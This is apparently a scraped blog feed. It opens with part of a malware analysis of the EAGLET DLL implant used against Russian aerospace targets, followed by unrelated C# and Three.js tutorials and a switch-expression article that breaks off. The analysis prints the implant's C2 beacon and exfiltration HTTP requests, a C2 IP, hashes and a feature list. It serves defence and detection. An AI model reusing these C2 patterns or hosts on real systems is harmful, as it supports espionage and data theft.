    Then, we saw the XLS file contains details about structured fields for recording container number, type, tare weight, load capacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.

    Then, we can see that the decoy contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking standardized inspection documentation.

    Overall, the decoy is basically about simulating an official Russian container inspection document—specifically, an Equipment Interchange Report (EIR)—used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts associated with Obltransterminal LLC. In, the next section, we will look into the EAGLET implant.

    Stage 3 – Malicious EAGLET implant.

    Initially, as we saw that the implant and loaded it into a PE-analysis tool, we could confirm that, this is a PE file, with the decoy being stored inside the overlay section, which we already saw previously.

    Next, looking into the exports of this malicious DLL, we looked into the EntryPoint and unfortunately it did not contain anything interesting. Next, looking into the DllEntryPoint which lead us to the DllMain which did contain interesting code, related to malicious behavior.

    The initial interesting function, which basically enumerates info on the target machine.

    In this function, the code goes ahead and creates a unique GUID of the target, which will be used to identify the victim, every time the implant is executed a new GUID is generated, this mimics the behavior of session-id which aids the operator or the threat actor to gain clarity on the target.

     

    Then, it enumerates the computer-name of the target machine along with the hostname and DNS domain name of the target machine. Once it has received it, then it goes ahead and creates a directory known as MicrosoftApppStore under the ProgramData location.

    Next, using CreateThread it creates a malicious thread, which is responsible for connecting to the command-and-control[C2] IP and much more.

    Next, we can see that the implant is using certain Windows networking APIs such as WinHttpOpen to initiate a HTTP session, masquerading under an uncommon looking user-agent string MicrosoftAppStore/2001.0, which then is followed by another API known as WinHtppConnect which tries to connect to the hardcoded command-and-control[C2] server which is 185.225.17.104 over port 80, in case it fails, it keeps on retrying.

    In, case the implants connect to the C2, it forms a URL path which us used to send a GET request to the C2 infrastructure. The entire request body looks something like this:

    GET /poll?id=<{randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1Host: 185.225.17.104

    After sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain instructions to perform certain instructions.

    Regarding the functionality, the implant supports shell-access which basically gives the C2-operator or threat actor a shell on the target machine, which can be further used to perform malicious activities.

    Another feature is the download feature, in this implant, which either downloads malicious content from the server or exfiltrating required or interesting files from the target machine. One feature downloads malicious content from the server and stores it under the location C:\ProgramData\MicrosoftAppStore\. As, the C2 is currently down, while this research is being published, the files which had or have been used could not be discovered.

    Later, another functionality irrelevant to this download feature also became quite evident that the implant is basically exfiltrating files from the target machine. The request body looks something like this:

    POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

    Therefore, the features are as follows.

    Feature Trigger Keyword Behavior Purpose
    Command Execution cmd: Executes a shell command received from the C2 server and captures the output Remote Code Execution
    File Download download: Downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\ Payload Staging
    Exfiltration (automatic) Sends back the result of command execution or download status to the C2 server via HTTP POST Data Exfiltration

    That sums up the technical analysis of the EAGLET implant, next, we will look into the other part, which focuses on infrastructural knowledge and hunting similar campaigns.

    Hunting and Infrastructure

    Infrastructural details

    In this section, we will look into the infrastructure related artefacts. Initially, the C2, which we found to be 185[.]225[.]17[.]104, which is responsible for connecting to the EAGLET implant. The C2 server is located in Romania under the ASN 39798 of MivoCloud SRL.

    Well, looking into it, we found that a lot of passive DNS records were pointing to historical infrastructure previously associated with the same threat cluster which links to TA505, which have been researched by researchers at BinaryDefense. The DNS records although suggest that similar or recycled infrastructure have been used in this campaign. Also, apart from the infrastructural co-relations with TA505 only in terms of using recycled domains, we also saw some other dodgy domains pointing have DNS records pointing towards this same infrastructure. With high-confidence, we can assure that, the current campaign has no-correlation with TA505, apart from the afore-mentioned information.

    Similar, to the campaign, targeting Aerospace sector, we have also found another campaign, which is targeting Russian Military sector through recruitment themed documents. We found in that campaign, the threat actor used EAGLET implant which connects to the C2, I.e., 188[.]127[.]254[.]44 which is located in Russian under the ASN 56694, belonging to LLC Smart Ape organization.

    Similar Campaigns

    Campaign 1 – Military Themed Targeting

    Initially, we saw the URL body, and many other behavioral artefacts of the implant, which led us to another set of campaigns, with exactly similar implant, used to target Russian Military Recruitment.

    This decoy was extracted from an EAGLET implant which is named as Договор_РН83_изменения.zip which translates to Contract_RN83_Changes , which has been targeting individuals and entities related to Russian Military recruitment. As, we can see that the decoy highlights multiple advantages of serving which includes house-mortgage to pension and many more advantages.

    Campaign 2 – EAGLET implant with no decoy embedded

    As, in the previous campaigns we saw that occasionally, the threat entity drops a malicious LNK, which executes the DLL implant and extracts the decoy present inside the implant’s overlay section, but in this, we also saw an implant, with no such decoy present inside.

    Along, with these, we also saw multiple overlaps of these campaigns having similar target-interests and implant code overlap with the threat entity known as Head Mare which have been targeting Russian speaking entities initially discovered by researchers at Kaspersky.

    Attribution

    Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.

    In our ongoing tracking on UNG0901, we discovered notable similarities and overlaps with threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.

    Key Overlaps Between UNG0901 and Head Mare

    1. Tooling Arsenal:

    Researchers at Kaspersky observed that Head Mare often uses a Golang based backdoor known as PhantomDL, which is often packed using software packer such as UPX, which have very simple yet functional features such as shell , download , upload , exit. Similarly, UNG0901 has also deployed EAGLET implant, which shows similar behavior and has nearly to very similar features such as shell, download, upload etc. which is programmed in C++.

    1. File-Naming technique:

    Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523, similarly in the campaigns which we witnessed by UNG0901, there were filenames with similar style such as Contract_RN83_Changes. And many more file-naming schemes which we found to be similar.

    1. Motivation:

    Head Mare has been targeting important entities related to Russia, whereas UNG0901 has also targeted multiple important entities belonging to Russia.

    Apart from these, there are much additional and strong similarities which reinforce the connection between these two threat entities; therefore, we attribute UNG0901 threat entity shares resources and many other similarities with Head Mare, targeting Russian governmental & non-governmental entities.

    Conclusion

    UNG0901 or Unknown-Group-901 demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare which shows multiple similarities such as decoy-nomenclature and much more.

    SEQRITE Protection

    IOCs

    File-Type FileName SHA-256
    LNK Договор_РН83_изменения.pdf.lnk a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c
    Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5
    DLL Договор_РН83_изменения.zip 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
    Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be
    N/A b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
    Договор_РН83_изменения.zip 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08
    Decoy[XLS/ PDF] temp.pdf 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786
    sample_extracted.xls f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d
    80650000 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff
    sample_extracted.xls c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e
    sample_extracted.xls 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652
    sample_extracted.xls e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204
    sample_extracted.xls a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401
    Email-File backup-message-10.2.2.20_9045-800282.eml ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7

    MITRE ATT&CK

    Tactic Technique ID Details
    Initial Access Spearphishing Attachment T1566.001 Malicious .EML file sent to VASO employee, impersonating a logistics center with TTN document lure.
    Execution System Binary Proxy Execution: Rundll32 T1218.011 DLL implant executed via trusted rundll32.exe LOLBIN, called from the .LNK file.
    PowerShell T1059.001 Used for locating and launching the DLL implant from multiple fallback directories.
    Persistence Implant in ZIP-disguised DLL [Custom] DLL masquerades as .ZIP file — persistence implied via operator-controlled executions.
    Defense Evasion Masquerading T1036 Implant disguised as ZIP, decoy XLS used to simulate sanctioned logistics paperwork.
    Discovery System Information Discovery T1082 Gathers hostname, computer name, domain; creates victim GUID to identify target.
    Domain Trust Discovery T1482 Enumerates victim’s DNS domain for network profiling.
    Command & Control Application Layer Protocol: HTTP T1071.001 Communicates with C2 via HTTP; uses MicrosoftAppStore/2001.0 User-Agent.
    Collection Data from Local System T1005 Exfiltrates system details and file contents as per threat actor’s command triggers.
    Exfiltration Exfiltration Over C2 Channel T1041 POST requests to /result endpoint on C2 with encoded command results or exfiltrated data.
    Impact Data Exfiltration T1537 Targeted data theft from Russian aerospace sector.

    Authors:

    Subhajeet Singha

    Sathwik Ram Prakki



    Source link

  • How to download an online file and store it on file system with C# &vert; Code4IT

    How to download an online file and store it on file system with C# | Code4IT


    Downloading a file from a remote resource seems an easy task: download the byte stream and copy it to a local file. Beware of edge cases!

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Downloading files from an online source and saving them on the local machine seems an easy task.

    And guess what? It is!

    In this article, we will learn how to download an online file, perform some operations on it – such as checking its file extension – and store it in a local folder. We will also learn how to deal with edge cases: what if the file does not exist? Can we overwrite existing files?

    How to download a file stream from an online resource using HttpClient

    Ok, this is easy. If you have the file URL, it’s easy to just download it using HttpClient.

    HttpClient httpClient = new HttpClient();
    Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
    

    Using HttpClient can cause some trouble, especially when you have a huge computational load. As a matter of fact, using HttpClientFactory is preferred, as we’ve already explained in a previous article.

    But, ok, it looks easy – way too easy! There are two more parts to consider.

    How to handle errors while downloading a stream of data

    You know, shit happens!

    There are at least 2 cases that stop you from downloading a file: the file does not exist or the file requires authentication to be accessed.

    In both cases, an HttpRequestException exception is thrown, with the following stack trace:

    at System.Net.Http.HttpResponseMessage.EnsureSuccessStatusCode()
    at System.Net.Http.HttpClient.GetStreamAsyncCore(HttpRequestMessage request, CancellationToken cancellationToken)
    

    As you can see, we are implicitly calling EnsureSuccessStatusCode while getting the stream of data.

    You can tell the consumer that we were not able to download the content in two ways: throw a custom exception or return Stream.Null. We will use Stream.Null for the sake of this article.

    Note: always throw custom exceptions and add context to them: this way, you’ll add more useful info to consumers and logs, and you can hide implementation details.

    So, let me refactor the part that downloads the file stream and put it in a standalone method:

    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (Exception ex)
        {
            return Stream.Null;
        }
    }
    

    so that we can use Stream.Null to check for the existence of the stream.

    How to store a file in your local machine

    Now we have our stream of data. We need to store it somewhere.

    We will need to copy our input stream to a FileStream object, placed within a using block.

    using (FileStream outputFileStream = new FileStream(path, FileMode.Create))
    {
        await fileStream.CopyToAsync(outputFileStream);
    }
    

    Possible errors and considerations

    When creating the FileStream instance, we have to pass the constructor both the full path of the image, with also the file name, and FileMode.Create, which tells the stream what type of operations should be supported.

    FileMode is an enum coming from the System.IO namespace, and has different values. Each value fits best for some use cases.

    public enum FileMode
    {
        CreateNew = 1,
        Create,
        Open,
        OpenOrCreate,
        Truncate,
        Append
    }
    

    Again, there are some edge cases that we have to consider:

    • the destination folder does not exist: you will get an DirectoryNotFoundException exception. You can easily fix it by calling Directory.CreateDirectory to generate all the hierarchy of folders defined in the path;
    • the destination file already exists: depending on the value of FileMode, you will see a different behavior. FileMode.Create overwrites the image, while FileMode.CreateNew throws an IOException in case the image already exists.

    Full Example

    It’s time to put the pieces together:

    async Task DownloadAndSave(string sourceFile, string destinationFolder, string destinationFileName)
    {
        Stream fileStream = await GetFileStream(sourceFile);
    
        if (fileStream != Stream.Null)
        {
            await SaveStream(fileStream, destinationFolder, destinationFileName);
        }
    }
    
    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (Exception ex)
        {
            return Stream.Null;
        }
    }
    
    async Task SaveStream(Stream fileStream, string destinationFolder, string destinationFileName)
    {
        if (!Directory.Exists(destinationFolder))
            Directory.CreateDirectory(destinationFolder);
    
        string path = Path.Combine(destinationFolder, destinationFileName);
    
        using (FileStream outputFileStream = new FileStream(path, FileMode.CreateNew))
        {
            await fileStream.CopyToAsync(outputFileStream);
        }
    }
    

    Bonus tips: how to deal with file names and extensions

    You have the file URL, and you want to get its extension and its plain file name.

    You can use some methods from the Path class:

    string image = "https://website.come/csharptips/format-interpolated-strings/featuredimage.png";
    Path.GetExtension(image); // .png
    Path.GetFileNameWithoutExtension(image); // featuredimage
    

    But not every image has a file extension. For example, Twitter cover images have this format: https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080×360

    string image = "https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080x360";
    Path.GetExtension(image); // [empty string]
    Path.GetFileNameWithoutExtension(image); // 1080x360
    

    Further readings

    As I said, you should not instantiate a new HttpClient() every time. You should use HttpClientFactory instead.

    If you want to know more details, I’ve got an article for you:

    🔗 C# Tip: use IHttpClientFactory to generate HttpClient instances | Code4IT

    This article first appeared on Code4IT 🐧

    Wrapping up

    This was a quick article, quite easy to understand – I hope!

    My main point here is that not everything is always as easy as it seems – you should always consider edge cases!

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Interactive Text Destruction with Three.js, WebGPU, and TSL

    Interactive Text Destruction with Three.js, WebGPU, and TSL



    When Flash was taken from us all those years ago, it felt like losing a creative home — suddenly, there were no tools left for building truly interactive experiences on the web. In its place, the web flattened into a static world of HTML and CSS.

    But those days are finally behind us. We’re picking up where we left off nearly two decades ago, and the web is alive again with rich, immersive experiences — thanks in large part to powerful tools like Three.js.

    I’ve been working with images, video, and interactive projects for 15 years, using things like Processing, p5.js, OpenFrameworks, and TouchDesigner. Last year, I added Three.js to the mix as a creative tool, and I’ve been loving the learning process. That ongoing exploration leads to little experiments like the one I’m sharing in this tutorial.

    Project Structure

    The structure of our script is going to be simple: one function to preload assets, and another one to build the scene.

    Since we’ll be working with 3D text, the first thing we need to do is load a font in .json format — the kind that works with Three.js.

    To convert a .ttf font into that format, you can use the Facetype.js tool, which generates a .typeface.json file.

    const Resources = {
    	font: null
    };
    
    function preload() {
    
    	const _font_loader = new FontLoader();
    	_font_loader.load( "../static/font/Times New Roman_Regular.json", ( font ) => {
    
    		Resources.font = font;
    		init();
    
    	} );
    
    }
    
    function init() {
    
    }
    
    window.onload = preload;

    Scene setup & Environment

    A classic Three.js scene — the only thing to keep in mind is that we’re working with Three Shader Language (TSL), which means our renderer needs to be a WebGPURenderer.

    const scene = new THREE.Scene();
    const camera = new THREE.PerspectiveCamera(75, window.innerWidth / window.innerHeight, 0.1, 1000);
    const renderer = new THREE.WebGPURenderer({ antialias: true });
    
    document.body.appendChild(renderer.domElement);
    
    renderer.setSize(window.innerWidth, window.innerHeight);
    camera.position.z = 5;
    
    scene.add(camera);

    Next, we’ll set up the scene environment to get some lighting going.

    To keep things simple and avoid loading more assets, we’ll use the default RoomEnvironment that “comes” with Three.js. We’ll also add a DirectionalLight to the scene.

    const environment = new RoomEnvironment();
    const pmremGenerator = new THREE.PMREMGenerator(renderer);
    scene.environment = pmremGenerator.fromSceneAsync(environment).texture;
    
    scene.environmentIntensity = 0.8;
    
    const   light = new THREE.DirectionalLight("#e7e2ca",5);
    light.position.x = 0.0;
    light.position.y = 1.2;
    light.position.z = 3.86;
    
    scene.add(light);

    TextGeometry

    We’ll use TextGeometry, which lets us create 3D text in Three.js.

    It uses a JSON font file (which we loaded earlier with FontLoader) and is configured with parameters like size, depth, and letter spacing.

    const text_geo = new TextGeometry("NUEVOS",{
        font:Resources.font,
        size:1.0,
        depth:0.2,
        bevelEnabled: true,
        bevelThickness: 0.1,
        bevelSize: 0.01,
        bevelOffset: 0,
        bevelSegments: 1
    }); 
    
    const mesh = new THREE.Mesh(
        text_geo,
        new THREE.MeshStandardMaterial({ 
            color: "#656565",
            metalness: 0.4, 
            roughness: 0.3
        })
    );
    
    scene.add(mesh);

    By default, the origin of the text sits at (0, 0), but we want it centered.
    To do that, we need to compute its BoundingBox and manually apply a translation to the geometry:

    text_geo.computeBoundingBox();
    const centerOffset = - 0.5 * ( text_geo.boundingBox.max.x - text_geo.boundingBox.min.x );
    const centerOffsety = - 0.5 * ( text_geo.boundingBox.max.y - text_geo.boundingBox.min.y );
    text_geo.translate( centerOffset, centerOffsety, 0 );

    Now that we have the mesh and material ready, we can move on to the function that lets us blow everything up 💥

    Three Shader Language

    I really love TSL — it’s closed the gap between ideas and execution, in a context that’s not always the friendliest… shaders.

    The effect we’re going to implement deforms the geometry’s vertices based on the pointer’s position, and uses spring physics to animate those deformations in a dynamic way.

    But before we get to that, let’s grab a few attributes we’ll need to make everything work properly:

    //  Original position of each vertex — we’ll use it as a reference
    //  so unaffected vertices can "return" to their original spot
    const initial_position = storage( text_geo.attributes.position, "vec3", count );
    
    //  Normal of each vertex — we’ll use this to know which direction to "push" in
    const normal_at = storage( text_geo.attributes.normal, "vec3", count );
    
    //  Number of vertices in the geometry
    const count = text_geo.attributes.position.count;

    Next, we’ll create a storage buffer to hold the simulation data — and we’ll also write a function.
    But not a regular JavaScript function — this one’s a compute function, written in the context of TSL.

    It runs on the GPU and we’ll use it to set up the initial values for our buffers, getting everything ready for the simulation.

    // In this buffer we’ll store the modified positions of each vertex —
    // in other words, their current state in the simulation.
    const   position_storage_at = storage(new THREE.StorageBufferAttribute(count,3),"vec3",count);   
    
    const compute_init = Fn( ()=>{
    
    	position_storage_at.element( instanceIndex ).assign( initial_position.element( instanceIndex ) );
    
    } )().compute( count );
    
    // Run the function on the GPU. This runs compute_init once per vertex.
    renderer.computeAsync( compute_init );

    Now we’re going to create another one of these functions — but unlike the previous one, this one will run inside the animation loop, since it’s responsible for updating the simulation on every frame.

    This function runs on the GPU and needs to receive values from the outside — like the pointer position, for example.

    To send that kind of data to the GPU, we use what’s called uniforms. They work like bridges between our “regular” code and the code that runs inside the GPU shader.

    They’re defined like this:

    const u_input_pos = uniform(new THREE.Vector3(0,0,0));
    const u_input_pos_press = uniform(0.0);

    With this, we can calculate the distance between the pointer position and each vertex of the geometry.

    Then we clamp that value so the deformation only affects vertices within a certain radius.
    To do that, we use the step function — it acts like a threshold, and lets us apply the effect only when the distance is below a defined value.

    Finally, we use the vertex normal as a direction to push it outward.

    const compute_update = Fn(() => {
    
        // Original position of the vertex — also its resting position
        const base_position = initial_position.element(instanceIndex);
    
        // The vertex normal tells us which direction to push
        const normal = normal_at.element(instanceIndex);
    
        // Current position of the vertex — we’ll update this every frame
        const current_position = position_storage_at.element(instanceIndex);
    
        // Calculate distance between the pointer and the base position of the vertex
        const distance = length(u_input_pos.sub(base_position));
    
        // Limit the effect's range: it only applies if distance is less than 0.5
        const pointer_influence = step(distance, 0.5).mul(1.0);
    
        // Compute the new displaced position along the normal.
        // Where pointer_influence is 0, there’ll be no deformation.
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
    
        // Assign the new position to update the vertex
        current_position.assign(disorted_pos);
    
    })().compute(count);
    

    To make this work, we’re missing two key steps: we need to assign the buffer with the modified positions to the material, and we need to make sure the renderer runs the compute function on every frame inside the animation loop.

    // Assign the buffer with the modified positions to the material
    mesh.material.positionNode = position_storage_at.toAttribute();
    
    // Animation loop
    function animate() {
    	// Run the compute function
    	renderer.computeAsync(compute_update_0);
    
    	// Render the scene
    	renderer.renderAsync(scene, camera);
    }

    Right now the function doesn’t produce anything too exciting — the geometry moves around in a kinda clunky way. We’re about to bring in springs, and things will get much better.

    // Spring — how much force we apply to reach the target value
    velocity += (target_value - current_value) * spring;
    
    // Friction controls the damping, so the movement doesn’t oscillate endlessly
    velocity *= friction;
    
    current_value += velocity;

    But before that, we need to store one more value per vertex, the velocity, so let’s create another storage buffer.

    const position_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    // New buffer for velocity
    const velocity_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    const compute_init = Fn(() => {
    
        position_storage_at.element(instanceIndex).assign(initial_position.element(instanceIndex));
        
        // We initialize it too
        velocity_storage_at.element(instanceIndex).assign(vec3(0.0, 0.0, 0.0));
    
    })().compute(count);

    We’ll also add two uniforms: spring and friction.

    const u_spring = uniform(0.05);
    const u_friction = uniform(0.9);

    Now we’ve implemented the springs in the update:

    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
    
        // Get current velocity
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        const   distance =  length(u_input_pos.sub(base_position));
        const   pointer_influence = step(distance,0.5).mul(1.5);
    
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
        disorted_pos.assign((mix(base_position, disorted_pos, u_input_pos_press)));
      
        // Spring implementation
        // velocity += (target_value - current_value) * spring;
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        // velocity *= friction;
        current_velocity.assign(current_velocity.mul(u_friction));
        // value += velocity
        current_position.addAssign(current_velocity);
    
    
    })().compute(count);

    Now we’ve got everything we need — time to start fine-tuning.

    We’re going to add two things. First, we’ll use the TSL function mx_noise_vec3 to generate some noise for each vertex. That way, we can tweak the direction a bit so things don’t feel so stiff.

    We’re also going to rotate the vertices using another TSL function — surprise, it’s called rotate.

    Here’s what our updated compute_update function looks like:

    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        // NEW: Add noise so the direction in which the vertices "explode" isn’t too perfectly aligned with the normal
        const noise = mx_noise_vec3(current_position.mul(0.5).add(vec3(0.0, time, 0.0)), 1.0).mul(u_noise_amp);
    
        const distance = length(u_input_pos.sub(base_position));
        const pointer_influence = step(distance, 0.5).mul(1.5);
    
        const disorted_pos = base_position.add(noise.mul(normal.mul(pointer_influence)));
    
        // NEW: Rotate the vertices to give the animation a more chaotic feel
        disorted_pos.assign(rotate(disorted_pos, vec3(normal.mul(distance)).mul(pointer_influence)));
    
        disorted_pos.assign(mix(base_position, disorted_pos, u_input_pos_press));
    
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        current_position.addAssign(current_velocity);
        current_velocity.assign(current_velocity.mul(u_friction));
    
    })().compute(count);
    

    Now that the motion feels right, it’s time to tweak the material colors a bit and add some post-processing to the scene.

    We’re going to work on the emissive color — meaning it won’t be affected by lights, and it’ll always look bright and explosive. Especially once we throw some bloom on top. (Yes, bloom everything.)

    We’ll start from a base color (whichever you like), passed in as a uniform. To make sure each vertex gets a slightly different color, we’ll offset its hue a bit using values from the buffers — in this case, the velocity buffer.

    The hue function takes a color and a value to shift its hue, kind of like how offsetHSL works in THREE.Color.

    // Base emissive color
    const emissive_color = color(new THREE.Color("0000ff"));
    
    const vel_at = velocity_storage_at.toAttribute();
    const hue_rotated = vel_at.mul(Math.PI*10.0);
    
    // Multiply by the length of the velocity buffer — this means the more movement,
    // the more the vertex color will shift
    const emission_factor = length(vel_at).mul(10.0);
    
    // Assign the color to the emissive node and boost it as much as you want
    mesh.material.emissiveNode = hue(emissive_color, hue_rotated).mul(emission_factor).mul(5.0);

    Finally! Lets change scene background color and add Fog:

    scene.fog = new THREE.Fog(new THREE.Color("#41444c"),0.0,8.5);
    scene.background = scene.fog.color;

    Now, let’s spice up the scene with a bit of post-processing — one of those things that got way easier to implement thanks to TSL.

    We’re going to include three effects: ambient occlusion, bloom, and noise. I always like adding some noise to what I do — it helps break up the flatness of the pixels a bit.

    I won’t go too deep into this part — I grabbed the AO setup from the Three.js examples.

    const   composer = new THREE.PostProcessing(renderer);
    const   scene_pass = pass(scene,camera);
    
    scene_pass.setMRT(mrt({
        output:output,
        normal:normalView
    }));
    
    const   scene_color = scene_pass.getTextureNode("output");
    const   scene_depth = scene_pass.getTextureNode("depth");
    const   scene_normal = scene_pass.getTextureNode("normal");
    
    const ao_pass = ao( scene_depth, scene_normal, camera);
    ao_pass.resolutionScale = 1.0;
    
    const   ao_denoise = denoise(ao_pass.getTextureNode(), scene_depth, scene_normal, camera ).mul(scene_color);
    const   bloom_pass = bloom(ao_denoise,0.3,0.2,0.1);
    const   post_noise = (mx_noise_float(vec3(uv(),time.mul(0.1)).mul(sizes.width),0.03)).mul(1.0);
    
    composer.outputNode = ao_denoise.add(bloom_pass).add(post_noise);

    Alright, that’s it amigas — thanks so much for reading, and I hope it was useful!



    Source link

  • Advanced Switch Expressions and Switch Statements using filters &vert; Code4IT

    Advanced Switch Expressions and Switch Statements using filters | Code4IT


    We all use switch statements in our code. Do you use them at their full potential?

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    We all use switch statements in our code: they are a helpful way to run different code paths based on an check on a variable.

    In this short article, we’re gonna learn different ways to write switch blocks, and some nice tricks to create clean and easy-to-read filters on such statements.

    For the sake of this example, we will use a dummy hierarchy of types: a base User record with three subtypes: Player, Gamer, and Dancer.

    public abstract record User(int Age);
    
    public record Player(int Age, string Sport) : User(Age);
    
    public record Gamer(int Age, string Console) : User(Age);
    
    public record Dancer(int Age, string Dance) : User(Age);
    

    Let’s see different usages of switch statements and switch expressions.

    Switch statements

    Switch statements are those with the standard switch (something) block. They allow for different executions of paths, acting as a list of ifelse if blocks.

    They can be used to return a value, but it’s not mandatory: you can simply use switch statements to execute code that does not return any value.

    Switch statements with checks on the type

    The most simple example we can have is the plain check on the type.

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer:
        {
            message = "I'm a gamer";
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a player
    

    Here we execute a different path based on the value the user variable has at runtime.

    We can also have an automatic casting to the actual type, and then use the runtime data within the case block:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); //I'm a gamer, and I have a Nintendo Switch
    

    As you can see, since user is a Gamer, within the related branch we cast the user to Gamer in a variable named g, so that we can use its public properties and methods.

    Filtering using the WHEN keyword

    We can add additional filters on the actual value of the variable by using the when clause:

    User user = new Gamer(3, "Nintendo");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g when g.Age < 10:
        {
            message = "I'm a gamer, but too young";
            break;
        }
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a gamer, but too young
    

    Here we have the when g.Age < 10 filter applied to the Gamer g variable.

    Clearly, if we set the age to 30, we will see I’m a gamer, and I have a Nintendo Switch.

    Switch Expression

    Switch expressions act like Switch Statements, but they return a value that can be assigned to a variable or, in general, used immediately.

    They look like a lightweight, inline version of Switch Statements, and have a slightly different syntax.

    To reach the same result we saw before, we can write:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = user switch
    {
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    
    Console.WriteLine(message);
    

    By looking at the syntax, we can notice a few things:

    • instead of having switch(variable_name){}, we now have variable_name switch {};
    • we use the arrow notation => to define the cases;
    • we don’t have the default keyword, but we use the discard value _.

    When keyword vs Property Pattern in Switch Expressions

    Similarly, we can use the when keyword to define better filters on the cases.

    string message = user switch
    {
        Gamer gg when gg.Age < 10 => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

